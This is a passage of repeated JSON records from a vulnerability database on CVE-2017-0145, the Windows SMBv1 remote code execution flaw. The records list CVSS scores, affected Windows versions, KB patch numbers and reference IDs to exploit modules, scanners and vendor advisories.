2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-05T06:46:35", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", 
"SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T06:46:35", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T06:46:35", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012215", "KB3210720", "KB3213986", "KB3205409", "KB3205401", "KB4012214", "KB3212646", "KBMS16-110, 3187754", "KB4013429", "KB4013198", "KB4012216", "KB4012213", "KB4012598", "KB4012212", "KB4012606", "KB4014077", "KB4012217", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T06:46:35", "differentElements": ["msAffectedSoftware"], "edition": 11}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-05T08:49:10", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "f5", "idList": 
["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T08:49:10", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB4012212", "KB4014077", "KB3213986", "KB3210720", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3205409", "KB3212646", "KB3210721", "KB4012214", "KB3177186", "KB4012215", "KB4012213", "KB4012216", "KB4013198", "KB4013429", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, 
{"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 12}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution 
vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-05T18:46:16", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", 
